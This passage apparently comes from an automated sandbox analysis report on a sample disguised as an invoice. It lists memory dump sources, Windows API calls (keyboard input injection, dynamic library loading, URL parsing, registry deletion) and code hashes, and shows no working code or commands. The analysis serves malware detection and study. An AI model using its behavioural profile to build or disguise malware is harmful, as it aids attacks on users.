                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: c0741313d5859cb8940fd6bd80a26f8c59bc832f384ec8573e07345e289196e1
                                                              • Instruction ID: 7b9fab757a5b16f1515026f143df64f016056fe79d52f59620cc083a85dce11d
                                                              • Opcode Fuzzy Hash: c0741313d5859cb8940fd6bd80a26f8c59bc832f384ec8573e07345e289196e1
                                                              • Instruction Fuzzy Hash: 4B31AD31620206ABDF218E38DC46BEA77A9FF49324F244715F979931E0C770E8648B94
                                                              APIs
                                                              • _memset.LIBCMT ref: 00245190
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 002451C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |$D$
                                                              • API String ID: 1413715105-2694590288
                                                              • Opcode ID: ccd93ba7c9a39cf2eb6e8725472365d94b7f7c28534061e2f72aaeecd217f7ce
                                                              • Instruction ID: e2e30056ee696c9bfab032f283656cd60a1defc6d23b2fa9135bbf736874d27f
                                                              • Opcode Fuzzy Hash: ccd93ba7c9a39cf2eb6e8725472365d94b7f7c28534061e2f72aaeecd217f7ce
                                                              • Instruction Fuzzy Hash: 4D314A71C1011DABCF05EFA4CD85AEEBFB9FF24700F000116F905A6166DB71AA56DBA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0025A15E
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0025A172
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0025A196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 68a00365bc3ed6e8b82f42f1dd8ef270d314cd2096df3a974ad5e54437e9797a
                                                              • Instruction ID: 27db706d532677a65007d6e27411cfc0f9d88612954f4d449c2716646c67b299
                                                              • Opcode Fuzzy Hash: 68a00365bc3ed6e8b82f42f1dd8ef270d314cd2096df3a974ad5e54437e9797a
                                                              • Instruction Fuzzy Hash: FF21F132520219ABDF118F94CC42FEA3B79FF48714F004214FE19AB1D0D6B1AC64CBA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0025A941
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0025A94F
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0025A956
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: 0ddcaa4ad9f2221c9f94a4b432abfdc1027be0821bb22ea1645fdf3fe08003ee
                                                              • Instruction ID: d64876ff5ec8ec780a2afe01a00299b58171715a3a7cedb0bee03c1793b6145a
                                                              • Opcode Fuzzy Hash: 0ddcaa4ad9f2221c9f94a4b432abfdc1027be0821bb22ea1645fdf3fe08003ee
                                                              • Instruction Fuzzy Hash: 9721C4B561020AAFDB10DF14DC96D7737ADEF5E3A4B050159FA0497251CB30EC25CB61
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00259A30
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00259A40
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00259A65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0025A46D
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0025A482
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0025A48F
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00212350,?), ref: 002122A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 002122A8
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 2574300362-340411864
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00212276), ref: 00212376
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0021237D
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 2574300362-2819208100
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,002521FB,?,002523EF), ref: 00252213
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00252225
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetProcessId$kernel32.dll
                                                              • API String ID: 2574300362-399901964
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,001F42EC,?,001F42AA,?), ref: 001F4304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001F4316
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,001F41BB,001F4341,?,001F422F,?,001F41BB,?,?,?,?,001F39FE,?,00000001), ref: 001F4359
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001F436B
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,0023051D,?,002305FE), ref: 00230547
                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00230559
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1071820185
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0023052F,?,002306D7), ref: 00230572
                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00230584
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1587604923
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0024ECBE,?,0024EBBB), ref: 0024ECD6
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0024ECE8
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0024BAD3,00000001,0024B6EE,?,0028DC00), ref: 0024BAEB
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0024BAFD
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00253BD1,?,00253E06), ref: 00253BE9
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00253BFB
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: c3a9d44a47083629d70680422f7a39e39f71001e74d36b36a66eaa0e2c3dab15
                                                              • Instruction ID: ef381c2a37e64558d6336b99fc6eeee3dd7f5a10a1f24a6e9faf6b6477783306
                                                              • Opcode Fuzzy Hash: c3a9d44a47083629d70680422f7a39e39f71001e74d36b36a66eaa0e2c3dab15
                                                              • Instruction Fuzzy Hash: E0D05E70420752DBC720AF60A808616BAB8AF02726B10446AE849A2150DAB0C4E48A10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b760e58ad782bec6e605716ec7c0cff904ed69ffdb3446a658958425414edd19
                                                              • Instruction ID: b35e8eaff39bf9a52f911889a1a16ebc548e72965d4b4eab0ef024fba1b36c41
                                                              • Opcode Fuzzy Hash: b760e58ad782bec6e605716ec7c0cff904ed69ffdb3446a658958425414edd19
                                                              • Instruction Fuzzy Hash: FFC19C75A2022AEFDB14DFD4D884AAEB7B4FF48700F104599E805EB251D770EE91DBA0
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0024AAB4
                                                              • CoUninitialize.OLE32 ref: 0024AABF
                                                                • Part of subcall function 00230213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0023027B
                                                              • VariantInit.OLEAUT32(?), ref: 0024AACA
                                                              • VariantClear.OLEAUT32(?), ref: 0024AD9D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: ebb88838ce0d18ba67b9766537de5efa00d05025b84b5f53cd6fdf61640bd43f
                                                              • Instruction ID: 3d475dd27a904a1ae267c9c30d0bb2a8b531f8fc11a087dbd2a04502f9290ff8
                                                              • Opcode Fuzzy Hash: ebb88838ce0d18ba67b9766537de5efa00d05025b84b5f53cd6fdf61640bd43f
                                                              • Instruction Fuzzy Hash: 78A176756547019FCB14EF24C881B2AB7E5BF98710F048449FA9A9B3A2CB30ED54CB86
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 1142aa81fb6e78b12e89cc8d25776ac1dd34f072e0a8c6b515d6fcdfdb526402
                                                              • Instruction ID: cc457f496ea6e6e22c476bb62e79fbcdc942aefbadb8fb05d0c463f350853699
                                                              • Opcode Fuzzy Hash: 1142aa81fb6e78b12e89cc8d25776ac1dd34f072e0a8c6b515d6fcdfdb526402
                                                              • Instruction Fuzzy Hash: 81516330634316BBDB24EFA5E49576EB3E9AF54310F20881FE546CB2D1DB7498E08B05
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3877424927-0
                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction ID: ecca778e39855c6c93e9e887cf5da4f83637e0d8e1d3f4793a6de687ce75a46c
                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction Fuzzy Hash: 8E519AB0A20346EBDB24CF6988845DEB7E6AF60320F244729F825962D0D7719FF18F44
                                                              APIs
                                                              • GetWindowRect.USER32(00C16338,?), ref: 0025C544
                                                              • ScreenToClient.USER32(?,00000002), ref: 0025C574
                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0025C5DA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: d6ad9b65281e9c7d4270f6dda36d87f87d15b0186c7fff1b903d998119a50893
                                                              • Instruction ID: 5325c3d5ca0f2c243959dc7b9e82c3118f0d2a4932ce28389e631d445475aae8
                                                              • Opcode Fuzzy Hash: d6ad9b65281e9c7d4270f6dda36d87f87d15b0186c7fff1b903d998119a50893
                                                              • Instruction Fuzzy Hash: 7E519F74910205EFCF10DF68D8809AE7BB9FF44721F608259F925AB290E730ED95CB94
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0022C462
                                                              • __itow.LIBCMT ref: 0022C49C
                                                                • Part of subcall function 0022C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0022C753
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0022C505
                                                              • __itow.LIBCMT ref: 0022C55A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 61beb226788c65fba293673e082ede214d9eb7cb10074ff881bfb731831cc972
                                                              • Instruction ID: 08af1e18c8bca3be84fc4b2b4d8e4a5d59a0bfd65dd90e27abdc6827df28bbd3
                                                              • Opcode Fuzzy Hash: 61beb226788c65fba293673e082ede214d9eb7cb10074ff881bfb731831cc972
                                                              • Instruction Fuzzy Hash: 1941E371A0061DBBDF21EF94D841BFE7BB9AF59700F000019FA05B7291DB70AA65CBA1
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00233966
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00233982
                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002339EF
                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00233A4D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 204f89a8275c6a4fe299d12ab108de0b9d5344dcf6f6d5ff0ba8a4df9b425779
                                                              • Instruction ID: 3164f74ac745f7c11b7bbaa2d0bb43dd1268afe030ebc21a5ae8c2ce2ab97d27
                                                              • Opcode Fuzzy Hash: 204f89a8275c6a4fe299d12ab108de0b9d5344dcf6f6d5ff0ba8a4df9b425779
                                                              • Instruction Fuzzy Hash: 1C4117B0A24208EAEF20CF65880A7FDBBB59B45311F04015AF4C5961C1C7B49FA5DB61
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0025B5D1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 2133212e0a537804b38d2ad05da5f72297b82b298d211e1a2931e59e6fcf8920
                                                              • Instruction ID: 334ea12a02d5581f8c2b453fce2056c888d56d439f56333e0558a393d6494c8b
                                                              • Opcode Fuzzy Hash: 2133212e0a537804b38d2ad05da5f72297b82b298d211e1a2931e59e6fcf8920
                                                              • Instruction Fuzzy Hash: C7310474630205BFEF2A9F28DC89FA87768EB05312F904101FE51D61E1D770E9B88B59
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 0025D807
                                                              • GetWindowRect.USER32(?,?), ref: 0025D87D
                                                              • PtInRect.USER32(?,?,0025ED5A), ref: 0025D88D
                                                              • MessageBeep.USER32(00000000), ref: 0025D8FE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 2583f1e10c37181650029a903785931068bc79efc0eacc73dee5b8e806430485
                                                              • Instruction ID: 89d8d0ca577e54ad4e0a1cf854578b280ab625ed95751ff5484942ff0acfdc16
                                                              • Opcode Fuzzy Hash: 2583f1e10c37181650029a903785931068bc79efc0eacc73dee5b8e806430485
                                                              • Instruction Fuzzy Hash: 31418074A2021ADFCB21DF58D888B6977F5FF45316F1881A5E8149F260D330E95ACF44
                                                              APIs
                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00233AB8
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00233AD4
                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00233B34
                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00233B92
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 9bab32e9e42fc2b8ccad5001eeaed45972a010dab2d6683d98c5a54325339681
                                                              • Instruction ID: ffe6d432eedb476d1d178eeaebc41a699cd838d9daf67c6fc5d19f25707bd4b1
                                                              • Opcode Fuzzy Hash: 9bab32e9e42fc2b8ccad5001eeaed45972a010dab2d6683d98c5a54325339681
                                                              • Instruction Fuzzy Hash: 143148B0A20259AEEF20CF6488197FDFBB7AF45329F04015AE485931D1C7748FA5C761
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00224038
                                                              • __isleadbyte_l.LIBCMT ref: 00224066
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00224094
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002240CA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
